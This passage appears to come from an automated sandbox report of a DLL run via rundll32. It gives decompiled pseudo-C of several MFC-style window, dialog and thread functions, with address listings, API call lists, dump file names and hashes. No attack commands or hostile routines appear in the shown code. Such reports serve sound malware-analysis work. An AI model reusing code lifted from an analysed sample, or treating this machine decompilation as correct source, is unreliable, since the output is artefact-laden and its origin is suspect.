                                                                                                                                    															__eflags = _t206 - 0xd;
                                                                                                                                    															if(_t206 != 0xd) {
                                                                                                                                    																L52:
                                                                                                                                    																__eflags = _t206 - 0x1b;
                                                                                                                                    																if(_t206 != 0x1b) {
                                                                                                                                    																	goto L55;
                                                                                                                                    																} else {
                                                                                                                                    																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                                    																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                                    																		goto L55;
                                                                                                                                    																	} else {
                                                                                                                                    																		goto L54;
                                                                                                                                    																	}
                                                                                                                                    																}
                                                                                                                                    															} else {
                                                                                                                                    																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                                    																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                                    																	L54:
                                                                                                                                    																	_t156 = 0;
                                                                                                                                    																} else {
                                                                                                                                    																	goto L52;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												} else {
                                                                                                                                    													__eflags = _v32 - _t229;
                                                                                                                                    													if(_v32 == _t229) {
                                                                                                                                    														goto L48;
                                                                                                                                    													} else {
                                                                                                                                    														__eflags = _v32 - 0x102;
                                                                                                                                    														if(_v32 != 0x102) {
                                                                                                                                    															L55:
                                                                                                                                    															_t240 = _a8;
                                                                                                                                    															goto L56;
                                                                                                                                    														} else {
                                                                                                                                    															goto L48;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t207 =  *(_t256 + 0x50);
                                                                                                                                    												__eflags = _t207;
                                                                                                                                    												if(_t207 == 0) {
                                                                                                                                    													goto L45;
                                                                                                                                    												} else {
                                                                                                                                    													__eflags =  *(_t207 + 0x58);
                                                                                                                                    													if( *(_t207 + 0x58) == 0) {
                                                                                                                                    														goto L45;
                                                                                                                                    													} else {
                                                                                                                                    														_t208 =  *(_t207 + 0x58);
                                                                                                                                    														_t232 =  *_t208;
                                                                                                                                    														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                                    														__eflags = _t209;
                                                                                                                                    														if(_t209 != 0) {
                                                                                                                                    															goto L45;
                                                                                                                                    														} else {
                                                                                                                                    															_t156 = _t209 + 1;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										goto L34;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								return E10030DFF(_t156);
                                                                                                                                    							} else {
                                                                                                                                    								_t232 =  *(_t238 + 4);
                                                                                                                                    								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                                    								__eflags = _t215 & 0x08000000;
                                                                                                                                    								if((_t215 & 0x08000000) == 0) {
                                                                                                                                    									goto L20;
                                                                                                                                    								} else {
                                                                                                                                    									goto L23;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							_t216 =  *(_t238 + 4);
                                                                                                                                    							if(_t216 == 0) {
                                                                                                                                    								_t217 =  *_t238;
                                                                                                                                    							} else {
                                                                                                                                    								_t217 =  *(_t216 + 0x24);
                                                                                                                                    							}
                                                                                                                                    							if(_t217 == 0) {
                                                                                                                                    								goto L21;
                                                                                                                                    							} else {
                                                                                                                                    								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                                    									L23:
                                                                                                                                    									__eflags = _t238 - _v8;
                                                                                                                                    									if(_t238 == _v8) {
                                                                                                                                    										break;
                                                                                                                                    									} else {
                                                                                                                                    										__eflags = _v8;
                                                                                                                                    										if(_v8 == 0) {
                                                                                                                                    											_v8 = _t238;
                                                                                                                                    										}
                                                                                                                                    										_t247 = _t247 + 1;
                                                                                                                                    										__eflags = _t247 - 0x200;
                                                                                                                                    										if(_t247 < 0x200) {
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											break;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									L20:
                                                                                                                                    									_t141 = _t238;
                                                                                                                                    									L28:
                                                                                                                                    									return _t141;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						_t232 = _a4;
                                                                                                                                    						_t238 = E1001E11F(_a4, _t238, 0);
                                                                                                                                    						if(_t238 == 0) {
                                                                                                                                    							break;
                                                                                                                                    						} else {
                                                                                                                                    							goto L14;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L126:
                                                                                                                                    				}
                                                                                                                                    				_t141 = 0;
                                                                                                                                    				__eflags = 0;
                                                                                                                                    				goto L28;
                                                                                                                                    			}




































































                                                                                                                                    0x1002ac86
                                                                                                                                    0x1002ac86
                                                                                                                                    0x1002ac9b
                                                                                                                                    0x1002ac9d
                                                                                                                                    0x1002ac9f
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aca5
                                                                                                                                    0x1002acab
                                                                                                                                    0x1002acae
                                                                                                                                    0x1002acb1
                                                                                                                                    0x1002acb6
                                                                                                                                    0x1002acb9
                                                                                                                                    0x1002acc6
                                                                                                                                    0x1002acc6
                                                                                                                                    0x00000000
                                                                                                                                    0x1002acb9
                                                                                                                                    0x1002ac71
                                                                                                                                    0x1002ac71
                                                                                                                                    0x1002ac77
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ac77
                                                                                                                                    0x1002ac6f
                                                                                                                                    0x1002ac56
                                                                                                                                    0x1002ab82
                                                                                                                                    0x1002ab82
                                                                                                                                    0x1002ab85
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab85
                                                                                                                                    0x1002ab7c
                                                                                                                                    0x1002ab73
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa30
                                                                                                                                    0x1002aa30
                                                                                                                                    0x1002abbf
                                                                                                                                    0x1002abbf
                                                                                                                                    0x1002abbf
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa36
                                                                                                                                    0x1002aa36
                                                                                                                                    0x1002aa39
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa3f
                                                                                                                                    0x1002aa3f
                                                                                                                                    0x1002aa42
                                                                                                                                    0x1002aae1
                                                                                                                                    0x1002aae3
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aae9
                                                                                                                                    0x1002aaeb
                                                                                                                                    0x1002aaf1
                                                                                                                                    0x1002aaf6
                                                                                                                                    0x1002aaf9
                                                                                                                                    0x1002aafc
                                                                                                                                    0x1002ab01
                                                                                                                                    0x1002ab06
                                                                                                                                    0x1002ab08
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab0e
                                                                                                                                    0x1002ab0e
                                                                                                                                    0x1002ab12
                                                                                                                                    0x1002ab27
                                                                                                                                    0x1002ab29
                                                                                                                                    0x1002ab2b
                                                                                                                                    0x1002ab39
                                                                                                                                    0x1002ab3b
                                                                                                                                    0x1002ab2d
                                                                                                                                    0x1002ab2e
                                                                                                                                    0x1002ab2e
                                                                                                                                    0x1002ab40
                                                                                                                                    0x1002ab42
                                                                                                                                    0x1002ab44
                                                                                                                                    0x1002ab4d
                                                                                                                                    0x1002ab52
                                                                                                                                    0x1002ab5b
                                                                                                                                    0x1002ab61
                                                                                                                                    0x1002ab61
                                                                                                                                    0x1002ab14
                                                                                                                                    0x1002ab14
                                                                                                                                    0x1002ab1a
                                                                                                                                    0x1002ab1c
                                                                                                                                    0x1002ab1c
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab12
                                                                                                                                    0x1002ab08
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa48
                                                                                                                                    0x1002aa48
                                                                                                                                    0x1002aa4b
                                                                                                                                    0x1002ab8b
                                                                                                                                    0x1002ab8b
                                                                                                                                    0x1002ab8d
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab93
                                                                                                                                    0x1002ab96
                                                                                                                                    0x1002ab9b
                                                                                                                                    0x1002ab9d
                                                                                                                                    0x1002ab9e
                                                                                                                                    0x1002abaf
                                                                                                                                    0x1002aba0
                                                                                                                                    0x1002aba0
                                                                                                                                    0x1002aba3
                                                                                                                                    0x1002aba5
                                                                                                                                    0x1002aba5
                                                                                                                                    0x1002abb4
                                                                                                                                    0x1002abb6
                                                                                                                                    0x1002abb8
                                                                                                                                    0x1002abbb
                                                                                                                                    0x1002abd6
                                                                                                                                    0x1002abd6
                                                                                                                                    0x1002abd8
                                                                                                                                    0x1002abdd
                                                                                                                                    0x1002abdf
                                                                                                                                    0x1002abed
                                                                                                                                    0x1002abf0
                                                                                                                                    0x00000000
                                                                                                                                    0x1002abf6
                                                                                                                                    0x1002abf6
                                                                                                                                    0x1002abf7
                                                                                                                                    0x1002abf8
                                                                                                                                    0x1002abf9
                                                                                                                                    0x1002abfb
                                                                                                                                    0x1002ac00
                                                                                                                                    0x1002ac01
                                                                                                                                    0x1002ac04
                                                                                                                                    0x1002ac0c
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ac0c
                                                                                                                                    0x1002abe1
                                                                                                                                    0x1002abe2
                                                                                                                                    0x00000000
                                                                                                                                    0x1002abe2
                                                                                                                                    0x1002abbd
                                                                                                                                    0x1002abc1
                                                                                                                                    0x1002abcc
                                                                                                                                    0x1002abce
                                                                                                                                    0x1002abd0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002abd0
                                                                                                                                    0x1002abbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa4b
                                                                                                                                    0x1002aa42
                                                                                                                                    0x1002aa39
                                                                                                                                    0x1002aa30
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a99a
                                                                                                                                    0x1002a99b
                                                                                                                                    0x1002a99b
                                                                                                                                    0x1002a99c
                                                                                                                                    0x1002a9c8
                                                                                                                                    0x1002a9cc
                                                                                                                                    0x1002a9d1
                                                                                                                                    0x1002a9d8
                                                                                                                                    0x1002a9de
                                                                                                                                    0x1002a9de
                                                                                                                                    0x1002a9e2
                                                                                                                                    0x1002a9e6
                                                                                                                                    0x1002a9ec
                                                                                                                                    0x1002a9ec
                                                                                                                                    0x1002a9f0
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a9f6
                                                                                                                                    0x1002a9f6
                                                                                                                                    0x1002a9fd
                                                                                                                                    0x1002aa02
                                                                                                                                    0x1002aa04
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa06
                                                                                                                                    0x1002aa06
                                                                                                                                    0x1002aa09
                                                                                                                                    0x1002aa0b
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa0d
                                                                                                                                    0x1002aa0e
                                                                                                                                    0x1002aa10
                                                                                                                                    0x1002accc
                                                                                                                                    0x1002accc
                                                                                                                                    0x1002accc
                                                                                                                                    0x1002aa0b
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa04
                                                                                                                                    0x1002a9e8
                                                                                                                                    0x1002a9e8
                                                                                                                                    0x1002a9ea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 656273425-0
                                                                                                                                    • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                    • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                                    • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                    • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				struct tagRECT _v28;
                                                                                                                                    				struct tagRECT _v44;
                                                                                                                                    				struct tagRECT _v60;
                                                                                                                                    				struct tagRECT _v80;
                                                                                                                                    				char _v100;
                                                                                                                                    				void* __edi;
                                                                                                                                    				intOrPtr _t58;
                                                                                                                                    				struct HWND__* _t59;
                                                                                                                                    				intOrPtr _t94;
                                                                                                                                    				signed int _t103;
                                                                                                                                    				struct HWND__* _t104;
                                                                                                                                    				void* _t105;
                                                                                                                                    				struct HWND__* _t107;
                                                                                                                                    				long _t108;
                                                                                                                                    				long _t116;
                                                                                                                                    				void* _t119;
                                                                                                                                    				struct HWND__* _t121;
                                                                                                                                    				void* _t123;
                                                                                                                                    				intOrPtr _t125;
                                                                                                                                    				intOrPtr _t129;
                                                                                                                                    
                                                                                                                                    				_t119 = __edx;
                                                                                                                                    				_t105 = __ebx;
                                                                                                                                    				_t125 = __ecx;
                                                                                                                                    				_v12 = __ecx;
                                                                                                                                    				_v8 = E1001DDC0(__ecx);
                                                                                                                                    				_t58 = _a4;
                                                                                                                                    				if(_t58 == 0) {
                                                                                                                                    					if((_v8 & 0x40000000) == 0) {
                                                                                                                                    						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                                    					} else {
                                                                                                                                    						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                                    					}
                                                                                                                                    					_t121 = _t59;
                                                                                                                                    					if(_t121 != 0) {
                                                                                                                                    						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                                    						if(_t104 != 0) {
                                                                                                                                    							_t121 = _t104;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                                    					_t121 =  *_t4;
                                                                                                                                    				}
                                                                                                                                    				_push(_t105);
                                                                                                                                    				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                                    				if((_v8 & 0x40000000) != 0) {
                                                                                                                                    					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                                    					GetClientRect(_t107,  &_v28);
                                                                                                                                    					GetClientRect(_t121,  &_v44);
                                                                                                                                    					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                                    				} else {
                                                                                                                                    					if(_t121 != 0) {
                                                                                                                                    						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                                    						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                                    							_t121 = 0;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_v100 = 0x28;
                                                                                                                                    					if(_t121 != 0) {
                                                                                                                                    						GetWindowRect(_t121,  &_v44);
                                                                                                                                    						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
                                                                                                                                    						CopyRect( &_v28,  &_v80);
                                                                                                                                    					} else {
                                                                                                                                    						_t94 = E10014B42();
                                                                                                                                    						if(_t94 != 0) {
                                                                                                                                    							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                                    						}
                                                                                                                                    						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
                                                                                                                                    						CopyRect( &_v44,  &_v80);
                                                                                                                                    						CopyRect( &_v28,  &_v80);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				_t108 = _v60.left;
                                                                                                                                    				asm("cdq");
                                                                                                                                    				_t123 = _v60.right - _t108;
                                                                                                                                    				asm("cdq");
                                                                                                                                    				_t120 = _v44.bottom;
                                                                                                                                    				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                                    				_a4 = _v60.bottom - _v60.top;
                                                                                                                                    				asm("cdq");
                                                                                                                                    				asm("cdq");
                                                                                                                                    				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                                    				if(_t116 >= _v28.left) {
                                                                                                                                    					if(_t123 + _t116 > _v28.right) {
                                                                                                                                    						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t116 = _v28.left;
                                                                                                                                    				}
                                                                                                                                    				if(_t129 >= _v28.top) {
                                                                                                                                    					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                                    						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t129 = _v28.top;
                                                                                                                                    				}
                                                                                                                                    				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                                    			}


























                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                    • GetParent.USER32(?), ref: 1001AA75
                                                                                                                                    • SendMessageA.USER32 ref: 1001AA98
                                                                                                                                    • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                                    • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 808654186-3887548279
                                                                                                                                    • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                    • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                                    • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                    • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 100161DE
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                                    • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3191170017-0
                                                                                                                                    • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                    • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                                    • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                    • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                    • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                    • API String ID: 667068680-3617302793
                                                                                                                                    • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                    • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                                    • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                    • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                                    • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                                    • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                                    • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                                    • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                                    • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                                      • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1509511306-0
                                                                                                                                    • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                    • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                                    • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                    • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                                    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                                      • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                                      • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                                    • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                                    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                                    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                                    • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                                      • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
